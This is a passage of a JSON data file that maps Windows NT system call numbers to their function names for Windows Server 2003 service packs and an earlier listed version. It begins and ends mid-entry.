\"70\": \"NtQueryVolumeInformationFile\", \"71\": \"NtCreateSection\", \"72\": \"NtFlushBuffersFile\", \"73\": \"NtApphelpCacheControl\", \"74\": \"NtCreateProcessEx\", \"75\": \"NtCreateThread\", \"76\": \"NtIsProcessInJob\", \"77\": \"NtProtectVirtualMemory\", \"78\": \"NtQuerySection\", \"79\": \"NtResumeThread\", \"80\": \"NtTerminateThread\", \"81\": \"NtReadRequestData\", \"82\": \"NtCreateFile\", \"83\": \"NtQueryEvent\", \"84\": \"NtWriteRequestData\", \"85\": \"NtOpenDirectoryObject\", \"86\": \"NtAccessCheckByTypeAndAuditAlarm\", \"87\": \"NtQuerySystemTime\", \"88\": \"NtWaitForMultipleObjects\", \"89\": \"NtSetInformationObject\", \"90\": \"NtCancelIoFile\", \"91\": \"NtTraceEvent\", \"92\": \"NtPowerInformation\", \"93\": \"NtSetValueKey\", \"94\": \"NtCancelTimer\", \"95\": \"NtSetTimer\", \"96\": \"NtAcceptConnectPort\", \"97\": \"NtAccessCheck\", \"98\": \"NtAccessCheckByType\", \"99\": \"NtAccessCheckByTypeResultList\", \"100\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"102\": \"NtAddBootEntry\", \"103\": \"NtAddDriverEntry\", \"104\": \"NtAdjustGroupsToken\", \"105\": \"NtAlertResumeThread\", \"106\": \"NtAlertThread\", \"107\": \"NtAllocateLocallyUniqueId\", \"108\": \"NtAllocateUserPhysicalPages\", \"109\": \"NtAllocateUuids\", \"110\": \"NtAreMappedFilesTheSame\", \"111\": \"NtAssignProcessToJobObject\", \"112\": \"NtCancelDeviceWakeupRequest\", \"113\": \"NtCompactKeys\", \"114\": \"NtCompareTokens\", \"115\": \"NtCompleteConnectPort\", \"116\": \"NtCompressKey\", \"117\": \"NtConnectPort\", \"118\": \"NtCreateDebugObject\", \"119\": \"NtCreateDirectoryObject\", \"120\": \"NtCreateEventPair\", \"121\": \"NtCreateIoCompletion\", \"122\": \"NtCreateJobObject\", \"123\": \"NtCreateJobSet\", \"124\": \"NtCreateKeyedEvent\", \"125\": \"NtCreateMailslotFile\", \"126\": \"NtCreateMutant\", \"127\": \"NtCreateNamedPipeFile\", \"128\": \"NtCreatePagingFile\", \"129\": \"NtCreatePort\", \"130\": \"NtCreateProcess\", \"131\": \"NtCreateProfile\", \"132\": \"NtCreateSemaphore\", \"133\": \"NtCreateSymbolicLinkObject\", \"134\": \"NtCreateTimer\", \"135\": \"NtCreateToken\", \"136\": \"NtCreateWaitablePort\", \"137\": \"NtDebugActiveProcess\", \"138\": \"NtDebugContinue\", \"139\": \"NtDeleteAtom\", \"140\": \"NtDeleteBootEntry\", \"141\": \"NtDeleteDriverEntry\", \"142\": \"NtDeleteFile\", \"143\": \"NtDeleteKey\", \"144\": \"NtDeleteObjectAuditAlarm\", \"145\": \"NtDeleteValueKey\", \"146\": \"NtDisplayString\", \"147\": \"NtEnumerateBootEntries\", \"148\": \"NtEnumerateDriverEntries\", \"149\": \"NtEnumerateSystemEnvironmentValuesEx\", \"150\": \"NtExtendSection\", \"151\": \"NtFilterToken\", \"152\": \"NtFlushInstructionCache\", \"153\": \"NtFlushKey\", \"154\": \"NtFlushVirtualMemory\", \"155\": \"NtFlushWriteBuffer\", \"156\": \"NtFreeUserPhysicalPages\", \"157\": \"NtGetContextThread\", \"158\": \"NtGetCurrentProcessorNumber\", \"159\": \"NtGetDevicePowerState\", \"160\": \"NtGetPlugPlayEvent\", \"161\": \"NtGetWriteWatch\", \"162\": \"NtImpersonateAnonymousToken\", \"163\": \"NtImpersonateThread\", \"164\": \"NtInitializeRegistry\", \"165\": \"NtInitiatePowerAction\", \"166\": \"NtIsSystemResumeAutomatic\", \"167\": \"NtListenPort\", \"168\": \"NtLoadDriver\", \"169\": \"NtLoadKey\", \"170\": \"NtLoadKey2\", \"171\": \"NtLoadKeyEx\", \"172\": \"NtLockFile\", \"173\": \"NtLockProductActivationKeys\", \"174\": \"NtLockRegistryKey\", \"175\": \"NtLockVirtualMemory\", \"176\": \"NtMakePermanentObject\", \"177\": \"NtMakeTemporaryObject\", \"178\": \"NtMapUserPhysicalPages\", \"179\": \"NtModifyBootEntry\", \"180\": \"NtModifyDriverEntry\", \"181\": \"NtNotifyChangeDirectoryFile\", \"182\": \"NtNotifyChangeKey\", \"183\": \"NtNotifyChangeMultipleKeys\", \"184\": \"NtOpenEventPair\", \"185\": \"NtOpenIoCompletion\", \"186\": \"NtOpenJobObject\", \"187\": \"NtOpenKeyedEvent\", \"188\": \"NtOpenMutant\", \"189\": \"NtOpenObjectAuditAlarm\", \"190\": \"NtOpenProcessToken\", \"191\": \"NtOpenSemaphore\", \"192\": \"NtOpenSymbolicLinkObject\", \"193\": \"NtOpenThread\", \"194\": \"NtOpenTimer\", \"195\": \"NtPlugPlayControl\", \"196\": \"NtPrivilegeCheck\", \"197\": \"NtPrivilegeObjectAuditAlarm\", \"198\": \"NtPrivilegedServiceAuditAlarm\", \"199\": \"NtPulseEvent\", \"200\": \"NtQueryBootEntryOrder\", \"201\": \"NtQueryBootOptions\", \"202\": \"NtQueryDebugFilterState\", \"203\": \"NtQueryDirectoryObject\", \"204\": \"NtQueryDriverEntryOrder\", \"205\": \"NtQueryEaFile\", \"206\": \"NtQueryFullAttributesFile\", \"207\": \"NtQueryInformationAtom\", \"208\": \"NtQueryInformationJobObject\", \"209\": \"NtQueryInformationPort\", \"210\": \"NtQueryInstallUILanguage\", \"211\": \"NtQueryIntervalProfile\", \"212\": \"NtQueryIoCompletion\", \"213\": \"NtQueryMultipleValueKey\", \"214\": \"NtQueryMutant\", \"215\": \"NtQueryOpenSubKeys\", \"216\": \"NtQueryOpenSubKeysEx\", \"217\": \"NtQueryPortInformationProcess\", \"218\": \"NtQueryQuotaInformationFile\", \"219\": \"NtQuerySecurityObject\", \"220\": \"NtQuerySemaphore\", \"221\": \"NtQuerySymbolicLinkObject\", \"222\": \"NtQuerySystemEnvironmentValue\", \"223\": \"NtQuerySystemEnvironmentValueEx\", \"224\": \"NtQueryTimerResolution\", \"225\": \"NtRaiseException\", \"226\": \"NtRaiseHardError\", \"227\": \"NtRegisterThreadTerminatePort\", \"228\": \"NtReleaseKeyedEvent\", \"229\": \"NtRemoveProcessDebug\", \"230\": \"NtRenameKey\", \"231\": \"NtReplaceKey\", \"232\": \"NtReplyWaitReplyPort\", \"233\": \"NtRequestDeviceWakeup\", \"234\": \"NtRequestPort\", \"235\": \"NtRequestWakeupLatency\", \"236\": \"NtResetEvent\", \"237\": \"NtResetWriteWatch\", \"238\": \"NtRestoreKey\", \"239\": \"NtResumeProcess\", \"240\": \"NtSaveKey\", \"241\": \"NtSaveKeyEx\", \"242\": \"NtSaveMergedKeys\", \"243\": \"NtSecureConnectPort\", \"244\": \"NtSetBootEntryOrder\", \"245\": \"NtSetBootOptions\", \"246\": \"NtSetContextThread\", \"247\": \"NtSetDebugFilterState\", \"248\": \"NtSetDefaultHardErrorPort\", \"249\": \"NtSetDefaultLocale\", \"250\": \"NtSetDefaultUILanguage\", \"251\": \"NtSetDriverEntryOrder\", \"252\": \"NtSetEaFile\", \"253\": \"NtSetHighEventPair\", \"254\": \"NtSetHighWaitLowEventPair\", \"255\": \"NtSetInformationDebugObject\", \"256\": \"NtSetInformationJobObject\", \"257\": \"NtSetInformationKey\", \"258\": \"NtSetInformationToken\", \"259\": \"NtSetIntervalProfile\", \"260\": \"NtSetIoCompletion\", \"261\": \"NtSetLdtEntries\", \"262\": \"NtSetLowEventPair\", \"263\": \"NtSetLowWaitHighEventPair\", \"264\": \"NtSetQuotaInformationFile\", \"265\": \"NtSetSecurityObject\", \"266\": \"NtSetSystemEnvironmentValue\", \"267\": \"NtSetSystemEnvironmentValueEx\", \"268\": \"NtSetSystemInformation\", \"269\": \"NtSetSystemPowerState\", \"270\": \"NtSetSystemTime\", \"271\": \"NtSetThreadExecutionState\", \"272\": \"NtSetTimerResolution\", \"273\": \"NtSetUuidSeed\", \"274\": \"NtSetVolumeInformationFile\", \"275\": \"NtShutdownSystem\", \"276\": \"NtSignalAndWaitForSingleObject\", \"277\": \"NtStartProfile\", \"278\": \"NtStopProfile\", \"279\": \"NtSuspendProcess\", \"280\": \"NtSuspendThread\", \"281\": \"NtSystemDebugControl\", \"282\": \"NtTerminateJobObject\", \"283\": \"NtTestAlert\", \"284\": \"NtTranslateFilePath\", \"285\": \"NtUnloadDriver\", \"286\": \"NtUnloadKey\", \"287\": \"NtUnloadKey2\", \"288\": \"NtUnloadKeyEx\", \"289\": \"NtUnlockFile\", \"290\": \"NtUnlockVirtualMemory\", \"291\": \"NtVdmControl\", \"292\": \"NtWaitForDebugEvent\", \"293\": \"NtWaitForKeyedEvent\", \"294\": \"NtWaitHighEventPair\", \"295\": \"NtWaitLowEventPair\"}}, \"Windows Server 2003\": {\"SP0\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\": \"NtReadFile\", \"4\": \"NtDeviceIoControlFile\", \"5\": \"NtWriteFile\", \"6\": \"NtRemoveIoCompletion\", \"7\": \"NtReleaseSemaphore\", \"8\": \"NtReplyWaitReceivePort\", \"9\": \"NtReplyPort\", \"10\": \"NtSetInformationThread\", \"11\": \"NtSetEvent\", \"12\": \"NtClose\", \"13\": \"NtQueryObject\", \"14\": \"NtQueryInformationFile\", \"15\": \"NtOpenKey\", \"16\": \"NtEnumerateValueKey\", \"17\": \"NtFindAtom\", \"18\": \"NtQueryDefaultLocale\", \"19\": \"NtQueryKey\", \"20\": \"NtQueryValueKey\", \"21\": \"NtAllocateVirtualMemory\", \"22\": \"NtQueryInformationProcess\", \"23\": \"NtWaitForMultipleObjects32\", \"24\": \"NtWriteFileGather\", \"25\": \"NtSetInformationProcess\", \"26\": \"NtCreateKey\", \"27\": \"NtFreeVirtualMemory\", \"28\": \"NtImpersonateClientOfPort\", \"29\": \"NtReleaseMutant\", \"30\": \"NtQueryInformationToken\", \"31\": \"NtRequestWaitReplyPort\", \"32\": \"NtQueryVirtualMemory\", \"33\": \"NtOpenThreadToken\", \"34\": \"NtQueryInformationThread\", \"35\": \"NtOpenProcess\", \"36\": \"NtSetInformationFile\", \"37\": \"NtMapViewOfSection\", \"38\": \"NtAccessCheckAndAuditAlarm\", \"39\": \"NtUnmapViewOfSection\", \"40\": \"NtReplyWaitReceivePortEx\", \"41\": \"NtTerminateProcess\", \"42\": \"NtSetEventBoostPriority\", \"43\": \"NtReadFileScatter\", \"44\": \"NtOpenThreadTokenEx\", \"45\": \"NtOpenProcessTokenEx\", \"46\": \"NtQueryPerformanceCounter\", \"47\": \"NtEnumerateKey\", \"48\": \"NtOpenFile\", \"49\": \"NtDelayExecution\", \"50\": \"NtQueryDirectoryFile\", \"51\": \"NtQuerySystemInformation\", \"52\": \"NtOpenSection\", \"53\": \"NtQueryTimer\", \"54\": \"NtFsControlFile\", \"55\": \"NtWriteVirtualMemory\", \"56\": \"NtCloseObjectAuditAlarm\", \"57\": \"NtDuplicateObject\", \"58\": \"NtQueryAttributesFile\", \"59\": \"NtClearEvent\", \"60\": \"NtReadVirtualMemory\", \"61\": \"NtOpenEvent\", \"62\": \"NtAdjustPrivilegesToken\", \"63\": \"NtDuplicateToken\", \"64\": \"NtContinue\", \"65\": \"NtQueryDefaultUILanguage\", \"66\": \"NtQueueApcThread\", \"67\": \"NtYieldExecution\", \"68\": \"NtAddAtom\", \"69\": \"NtCreateEvent\", \"70\": \"NtQueryVolumeInformationFile\", \"71\": \"NtCreateSection\", \"72\": \"NtFlushBuffersFile\", \"73\": \"NtApphelpCacheControl\", \"74\": \"NtCreateProcessEx\", \"75\": \"NtCreateThread\", \"76\": \"NtIsProcessInJob\", \"77\": \"NtProtectVirtualMemory\", \"78\": \"NtQuerySection\", \"79\": \"NtResumeThread\", \"80\": \"NtTerminateThread\", \"81\": \"NtReadRequestData\", \"82\": \"NtCreateFile\", \"83\": \"NtQueryEvent\", \"84\": \"NtWriteRequestData\", \"85\": \"NtOpenDirectoryObject\", \"86\": \"NtAccessCheckByTypeAndAuditAlarm\", \"87\": \"NtQuerySystemTime\", \"88\": \"NtWaitForMultipleObjects\", \"89\": \"NtSetInformationObject\", \"90\": \"NtCancelIoFile\", \"91\": \"NtTraceEvent\", \"92\": \"NtPowerInformation\", \"93\": \"NtSetValueKey\", \"94\": \"NtCancelTimer\", \"95\": \"NtSetTimer\", \"96\": \"NtAcceptConnectPort\", \"97\": \"NtAccessCheck\", \"98\": \"NtAccessCheckByType\", \"99\": \"NtAccessCheckByTypeResultList\", \"100\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"102\": \"NtAddBootEntry\", \"103\": \"NtAddDriverEntry\", \"104\": \"NtAdjustGroupsToken\", \"105\": \"NtAlertResumeThread\", \"106\": \"NtAlertThread\", \"107\": \"NtAllocateLocallyUniqueId\", \"108\": \"NtAllocateUserPhysicalPages\", \"109\": \"NtAllocateUuids\", \"110\": \"NtAreMappedFilesTheSame\", \"111\": \"NtAssignProcessToJobObject\", \"112\": \"NtCancelDeviceWakeupRequest\", \"113\": \"NtCompactKeys\", \"114\": \"NtCompareTokens\", \"115\": \"NtCompleteConnectPort\", \"116\": \"NtCompressKey\", \"117\": \"NtConnectPort\", \"118\": \"NtCreateDebugObject\", \"119\": \"NtCreateDirectoryObject\", \"120\": \"NtCreateEventPair\", \"121\": \"NtCreateIoCompletion\", \"122\": \"NtCreateJobObject\", \"123\": \"NtCreateJobSet\", \"124\": \"NtCreateKeyedEvent\", \"125\": \"NtCreateMailslotFile\", \"126\": \"NtCreateMutant\", \"127\": \"NtCreateNamedPipeFile\", \"128\": \"NtCreatePagingFile\", \"129\": \"NtCreatePort\", \"130\": \"NtCreateProcess\", \"131\": \"NtCreateProfile\", \"132\": \"NtCreateSemaphore\", \"133\": \"NtCreateSymbolicLinkObject\", \"134\": \"NtCreateTimer\", \"135\": \"NtCreateToken\", \"136\": \"NtCreateWaitablePort\", \"137\": \"NtDebugActiveProcess\", \"138\": \"NtDebugContinue\", \"139\": \"NtDeleteAtom\", \"140\": \"NtDeleteBootEntry\", \"141\": \"NtDeleteDriverEntry\", \"142\": \"NtDeleteFile\", \"143\": \"NtDeleteKey\", \"144\": \"NtDeleteObjectAuditAlarm\", \"145\": \"NtDeleteValueKey\", \"146\": \"NtDisplayString\", \"147\": \"NtEnumerateBootEntries\", \"148\": \"NtEnumerateDriverEntries\", \"149\": \"NtEnumerateSystemEnvironmentValuesEx\", \"150\": \"NtExtendSection\", \"151\": \"NtFilterToken\", \"152\": \"NtFlushInstructionCache\", \"153\": \"NtFlushKey\", \"154\": \"NtFlushVirtualMemory\", \"155\": \"NtFlushWriteBuffer\", \"156\": \"NtFreeUserPhysicalPages\", \"157\": \"NtGetContextThread\", \"158\": \"NtGetCurrentProcessorNumber\", \"159\": \"NtGetDevicePowerState\", \"160\": \"NtGetPlugPlayEvent\", \"161\": \"NtGetWriteWatch\", \"162\": \"NtImpersonateAnonymousToken\", \"163\": \"NtImpersonateThread\", \"164\": \"NtInitializeRegistry\", \"165\": \"NtInitiatePowerAction\", \"166\": \"NtIsSystemResumeAutomatic\", \"167\": \"NtListenPort\", \"168\": \"NtLoadDriver\", \"169\": \"NtLoadKey\", \"170\": \"NtLoadKey2\", \"171\": \"NtLoadKeyEx\", \"172\": \"NtLockFile\", \"173\": \"NtLockProductActivationKeys\", \"174\": \"NtLockRegistryKey\", \"175\": \"NtLockVirtualMemory\", \"176\": \"NtMakePermanentObject\", \"177\": \"NtMakeTemporaryObject\", \"178\": \"NtMapUserPhysicalPages\", \"179\": \"NtModifyBootEntry\", \"180\": \"NtModifyDriverEntry\", \"181\": \"NtNotifyChangeDirectoryFile\", \"182\": \"NtNotifyChangeKey\", \"183\": \"NtNotifyChangeMultipleKeys\", \"184\": \"NtOpenEventPair\", \"185\": \"NtOpenIoCompletion\", \"186\": \"NtOpenJobObject\", \"187\": \"NtOpenKeyedEvent\", \"188\": \"NtOpenMutant\", \"189\": \"NtOpenObjectAuditAlarm\", \"190\": \"NtOpenProcessToken\", \"191\": \"NtOpenSemaphore\", \"192\": \"NtOpenSymbolicLinkObject\", \"193\": \"NtOpenThread\", \"194\": \"NtOpenTimer\", \"195\": \"NtPlugPlayControl\", \"196\": \"NtPrivilegeCheck\", \"197\": \"NtPrivilegeObjectAuditAlarm\", \"198\": \"NtPrivilegedServiceAuditAlarm\", \"199\": \"NtPulseEvent\", \"200\": \"NtQueryBootEntryOrder\", \"201\": \"NtQueryBootOptions\", \"202\": \"NtQueryDebugFilterState\", \"203\": \"NtQueryDirectoryObject\", \"204\": \"NtQueryDriverEntryOrder\", \"205\": \"NtQueryEaFile\", \"206\": \"NtQueryFullAttributesFile\", \"207\": \"NtQueryInformationAtom\", \"208\": \"NtQueryInformationJobObject\", \"209\": \"NtQueryInformationPort\", \"210\": \"NtQueryInstallUILanguage\", \"211\": \"NtQueryIntervalProfile\", \"212\": \"NtQueryIoCompletion\", \"213\": \"NtQueryMultipleValueKey\", \"214\": \"NtQueryMutant\", \"215\": \"NtQueryOpenSubKeys\", \"216\": \"NtQueryOpenSubKeysEx\", \"217\": \"NtQueryPortInformationProcess\", \"218\": \"NtQueryQuotaInformationFile\", \"219\": \"NtQuerySecurityObject\", \"220\": \"NtQuerySemaphore\", \"221\": \"NtQuerySymbolicLinkObject\", \"222\": \"NtQuerySystemEnvironmentValue\", \"223\": \"NtQuerySystemEnvironmentValueEx\", \"224\": \"NtQueryTimerResolution\", \"225\": \"NtRaiseException\", \"226\": \"NtRaiseHardError\", \"227\": \"NtRegisterThreadTerminatePort\", \"228\": \"NtReleaseKeyedEvent\", \"229\": \"NtRemoveProcessDebug\", \"230\": \"NtRenameKey\", \"231\": \"NtReplaceKey\", \"232\": \"NtReplyWaitReplyPort\", \"233\": \"NtRequestDeviceWakeup\", \"234\": \"NtRequestPort\", \"235\": \"NtRequestWakeupLatency\", \"236\": \"NtResetEvent\", \"237\": \"NtResetWriteWatch\", \"238\": \"NtRestoreKey\", \"239\": \"NtResumeProcess\", \"240\": \"NtSaveKey\", \"241\": \"NtSaveKeyEx\", \"242\": \"NtSaveMergedKeys\", \"243\": \"NtSecureConnectPort\", \"244\": \"NtSetBootEntryOrder\", \"245\": \"NtSetBootOptions\", \"246\": \"NtSetContextThread\", \"247\": \"NtSetDebugFilterState\", \"248\": \"NtSetDefaultHardErrorPort\", \"249\": \"NtSetDefaultLocale\", \"250\": \"NtSetDefaultUILanguage\", \"251\": \"NtSetDriverEntryOrder\", \"252\": \"NtSetEaFile\", \"253\": \"NtSetHighEventPair\", \"254\": \"NtSetHighWaitLowEventPair\", \"255\": \"NtSetInformationDebugObject\", \"256\": \"NtSetInformationJobObject\", \"257\": \"NtSetInformationKey\", \"258\": \"NtSetInformationToken\", \"259\": \"NtSetIntervalProfile\", \"260\": \"NtSetIoCompletion\", \"261\": \"NtSetLdtEntries\", \"262\": \"NtSetLowEventPair\", \"263\": \"NtSetLowWaitHighEventPair\", \"264\": \"NtSetQuotaInformationFile\", \"265\": \"NtSetSecurityObject\", \"266\": \"NtSetSystemEnvironmentValue\", \"267\": \"NtSetSystemEnvironmentValueEx\", \"268\": \"NtSetSystemInformation\", \"269\": \"NtSetSystemPowerState\", \"270\": \"NtSetSystemTime\", \"271\": \"NtSetThreadExecutionState\", \"272\": \"NtSetTimerResolution\", \"273\": \"NtSetUuidSeed\", \"274\": \"NtSetVolumeInformationFile\", \"275\": \"NtShutdownSystem\", \"276\": \"NtSignalAndWaitForSingleObject\", \"277\": \"NtStartProfile\", \"278\": \"NtStopProfile\", \"279\": \"NtSuspendProcess\", \"280\": \"NtSuspendThread\", \"281\": \"NtSystemDebugControl\", \"282\": \"NtTerminateJobObject\", \"283\": \"NtTestAlert\", \"284\": \"NtTranslateFilePath\", \"285\": \"NtUnloadDriver\", \"286\": \"NtUnloadKey\", \"287\": \"NtUnloadKey2\", \"288\": \"NtUnloadKeyEx\", \"289\": \"NtUnlockFile\", \"290\": \"NtUnlockVirtualMemory\", \"291\": \"NtVdmControl\", \"292\": \"NtWaitForDebugEvent\", \"293\": \"NtWaitForKeyedEvent\", \"294\": \"NtWaitHighEventPair\", \"295\": \"NtWaitLowEventPair\"}, \"SP2\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\": \"NtReadFile\", \"4\": \"NtDeviceIoControlFile\", \"5\": \"NtWriteFile\", \"6\": \"NtRemoveIoCompletion\", \"7\": \"NtReleaseSemaphore\", \"8\": \"NtReplyWaitReceivePort\", \"9\": \"NtReplyPort\", \"10\": \"NtSetInformationThread\", \"11\": \"NtSetEvent\", \"12\": \"NtClose\", \"13\": \"NtQueryObject\", \"14\": \"NtQueryInformationFile\", \"15\": \"NtOpenKey\", \"16\": \"NtEnumerateValueKey\", \"17\": \"NtFindAtom\", \"18\": \"NtQueryDefaultLocale\", \"19\": \"NtQueryKey\", \"20\": \"NtQueryValueKey\", \"21\": \"NtAllocateVirtualMemory\", \"22\": \"NtQueryInformationProcess\", \"23\": \"NtWaitForMultipleObjects32\", \"24\": \"NtWriteFileGather\", \"25\": \"NtSetInformationProcess\", \"26\": \"NtCreateKey\", \"27\": \"NtFreeVirtualMemory\", \"28\": \"NtImpersonateClientOfPort\", \"29\": \"NtReleaseMutant\", \"30\": \"NtQueryInformationToken\", \"31\": \"NtRequestWaitReplyPort\", \"32\": \"NtQueryVirtualMemory\", \"33\": \"NtOpenThreadToken\", \"34\": \"NtQueryInformationThread\", \"35\": \"NtOpenProcess\", \"36\": \"NtSetInformationFile\", \"37\": \"NtMapViewOfSection\", \"38\": \"NtAccessCheckAndAuditAlarm\", \"39\": \"NtUnmapViewOfSection\", \"40\": \"NtReplyWaitReceivePortEx\", \"41\": \"NtTerminateProcess\", \"42\": \"NtSetEventBoostPriority\", \"43\": \"NtReadFileScatter\", \"44\": \"NtOpenThreadTokenEx\", \"45\": \"NtOpenProcessTokenEx\", \"46\": \"NtQueryPerformanceCounter\", \"47\": \"NtEnumerateKey\", \"48\": \"NtOpenFile\", \"49\": \"NtDelayExecution\", \"50\": \"NtQueryDirectoryFile\", \"51\": \"NtQuerySystemInformation\", \"52\": \"NtOpenSection\", \"53\": \"NtQueryTimer\", \"54\": \"NtFsControlFile\", \"55\": \"NtWriteVirtualMemory\", \"56\": \"NtCloseObjectAuditAlarm\", \"57\": \"NtDuplicateObject\", \"58\": \"NtQueryAttributesFile\", \"59\": \"NtClearEvent\", \"60\": \"NtReadVirtualMemory\", \"61\": \"NtOpenEvent\", \"62\": \"NtAdjustPrivilegesToken\", \"63\": \"NtDuplicateToken\", \"64\": \"NtContinue\", \"65\": \"NtQueryDefaultUILanguage\", \"66\": \"NtQueueApcThread\", \"67\": \"NtYieldExecution\", \"68\": \"NtAddAtom\", \"69\": \"NtCreateEvent\", \"70\": \"NtQueryVolumeInformationFile\", \"71\": \"NtCreateSection\", \"72\": \"NtFlushBuffersFile\", \"73\": \"NtApphelpCacheControl\", \"74\": \"NtCreateProcessEx\", \"75\": \"NtCreateThread\", \"76\": \"NtIsProcessInJob\", \"77\": \"NtProtectVirtualMemory\", \"78\": \"NtQuerySection\", \"79\": \"NtResumeThread\", \"80\": \"NtTerminateThread\", \"81\": \"NtReadRequestData\", \"82\": \"NtCreateFile\", \"83\": \"NtQueryEvent\", \"84\": \"NtWriteRequestData\", \"85\": \"NtOpenDirectoryObject\", \"86\": \"NtAccessCheckByTypeAndAuditAlarm\", \"87\": \"NtQuerySystemTime\", \"88\": \"NtWaitForMultipleObjects\", \"89\": \"NtSetInformationObject\", \"90\": \"NtCancelIoFile\", \"91\": \"NtTraceEvent\", \"92\": \"NtPowerInformation\", \"93\": \"NtSetValueKey\", \"94\": \"NtCancelTimer\", \"95\": \"NtSetTimer\", \"96\": \"NtAcceptConnectPort\", \"97\": \"NtAccessCheck\", \"98\": \"NtAccessCheckByType\", \"99\": \"NtAccessCheckByTypeResultList\", \"100\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"102\": \"NtAddBootEntry\", \"103\": \"NtAddDriverEntry\", \"104\": \"NtAdjustGroupsToken\", \"105\": \"NtAlertResumeThread\", \"106\": \"NtAlertThread\", \"107\": \"NtAllocateLocallyUniqueId\", \"108\": \"NtAllocateUserPhysicalPages\", \"109\": \"NtAllocateUuids\", \"110\": \"NtAreMappedFilesTheSame\", \"111\": \"NtAssignProcessToJobObject\", \"112\": \"NtCancelDeviceWakeupRequest\", \"113\": \"NtCompactKeys\", \"114\": \"NtCompareTokens\", \"115\": \"NtCompleteConnectPort\", \"116\": \"NtCompressKey\", \"117\": \"NtConnectPort\", \"118\": \"NtCreateDebugObject\", \"119\": \"NtCreateDirectoryObject\", \"120\": \"NtCreateEventPair\", \"121\": \"NtCreateIoCompletion\", \"122\": \"NtCreateJobObject\", \"123\": \"NtCreateJobSet\", \"124\": \"NtCreateKeyedEvent\", \"125\": \"NtCreateMailslotFile\", \"126\": \"NtCreateMutant\", \"127\": \"NtCreateNamedPipeFile\", \"128\": \"NtCreatePagingFile\", \"129\": \"NtCreatePort\", \"130\": \"NtCreateProcess\", \"131\": \"NtCreateProfile\", \"132\": \"NtCreateSemaphore\", \"133\": \"NtCreateSymbolicLinkObject\", \"134\": \"NtCreateTimer\", \"135\": \"NtCreateToken\", \"136\": \"NtCreateWaitablePort\", \"137\": \"NtDebugActiveProcess\", \"138\": \"NtDebugContinue\", \"139\": \"NtDeleteAtom\", \"140\": \"NtDeleteBootEntry\", \"141\": \"NtDeleteDriverEntry\", \"142\": \"NtDeleteFile\", \"143\": \"NtDeleteKey\", \"144\": \"NtDeleteObjectAuditAlarm\", \"145\": \"NtDeleteValueKey\", \"146\": \"NtDisplayString\", \"147\": \"NtEnumerateBootEntries\", \"148\": \"NtEnumerateDriverEntries\", \"149\": \"NtEnumerateSystemEnvironmentValuesEx\", \"150\": \"NtExtendSection\", \"151\": \"NtFilterToken\", \"152\": \"NtFlushInstructionCache\", \"153\": \"NtFlushKey\", \"154\": \"NtFlushVirtualMemory\", \"155\": \"NtFlushWriteBuffer\", \"156\": \"NtFreeUserPhysicalPages\", \"157\": \"NtGetContextThread\", \"158\": \"NtGetCurrentProcessorNumber\", \"159\": \"NtGetDevicePowerState\", \"160\": \"NtGetPlugPlayEvent\", \"161\": \"NtGetWriteWatch\", \"162\": \"NtImpersonateAnonymousToken\", \"163\": \"NtImpersonateThread\", \"164\": \"NtInitializeRegistry\", \"165\": \"NtInitiatePowerAction\", \"166\": \"NtIsSystemResumeAutomatic\", \"167\": \"NtListenPort\", \"168\": \"NtLoadDriver\", \"169\": \"NtLoadKey\", \"170\": \"NtLoadKey2\", \"171\": \"NtLoadKeyEx\", \"172\": \"NtLockFile\", \"173\": \"NtLockProductActivationKeys\", \"174\": \"NtLockRegistryKey\", \"175\": \"NtLockVirtualMemory\", \"176\": \"NtMakePermanentObject\", \"177\": \"NtMakeTemporaryObject\", \"178\": \"NtMapUserPhysicalPages\", \"179\": \"NtModifyBootEntry\", \"180\": \"NtModifyDriverEntry\", \"181\": \"NtNotifyChangeDirectoryFile\", \"182\": \"NtNotifyChangeKey\", \"183\": \"NtNotifyChangeMultipleKeys\", \"184\": \"NtOpenEventPair\", \"185\": \"NtOpenIoCompletion\", \"186\": \"NtOpenJobObject\", \"187\": \"NtOpenKeyedEvent\", \"188\": \"NtOpenMutant\", \"189\": \"NtOpenObjectAuditAlarm\", \"190\": \"NtOpenProcessToken\", \"191\": \"NtOpenSemaphore\", \"192\": \"NtOpenSymbolicLinkObject\", \"193\": \"NtOpenThread\", \"194\": \"NtOpenTimer\", \"195\": \"NtPlugPlayControl\", \"196\": \"NtPrivilegeCheck\", \"197\": \"NtPrivilegeObjectAuditAlarm\", \"198\": \"NtPrivilegedServiceAuditAlarm\", \"199\": \"NtPulseEvent\", \"200\": \"NtQueryBootEntryOrder\", \"201\": \"NtQueryBootOptions\", \"202\": \"NtQueryDebugFilterState\", \"203\": \"NtQueryDirectoryObject\", \"204\": \"NtQueryDriverEntryOrder\", \"205\": \"NtQueryEaFile\", \"206\": \"NtQueryFullAttributesFile\", \"207\": \"NtQueryInformationAtom\", \"208\": \"NtQueryInformationJobObject\", \"209\": \"NtQueryInformationPort\", \"210\": \"NtQueryInstallUILanguage\", \"211\": \"NtQueryIntervalProfile\", \"212\": \"NtQueryIoCompletion\", \"213\": \"NtQueryMultipleValueKey\", \"214\": \"NtQueryMutant\", \"215\": \"NtQueryOpenSubKeys\", \"216\": \"NtQueryOpenSubKeysEx\", \"217\": \"NtQueryPortInformationProcess\", \"218\": \"NtQueryQuotaInformationFile\", \"219\": \"NtQuerySecurityObject\", \"220\": \"NtQuerySemaphore\", \"221\": \"NtQuerySymbolicLinkObject\", \"222\": \"NtQuerySystemEnvironmentValue\", \"223\": \"NtQuerySystemEnvironmentValueEx\", \"224\": \"NtQueryTimerResolution\", \"225\": \"NtRaiseException\", \"226\": \"NtRaiseHardError\", \"227\": \"NtRegisterThreadTerminatePort\", \"228\": \"NtReleaseKeyedEvent\", \"229\": \"NtRemoveProcessDebug\", \"230\": \"NtRenameKey\", \"231\": \"NtReplaceKey\", \"232\": \"NtReplyWaitReplyPort\", \"233\": \"NtRequestDeviceWakeup\", \"234\": \"NtRequestPort\", \"235\": \"NtRequestWakeupLatency\", \"236\": \"NtResetEvent\", \"237\": 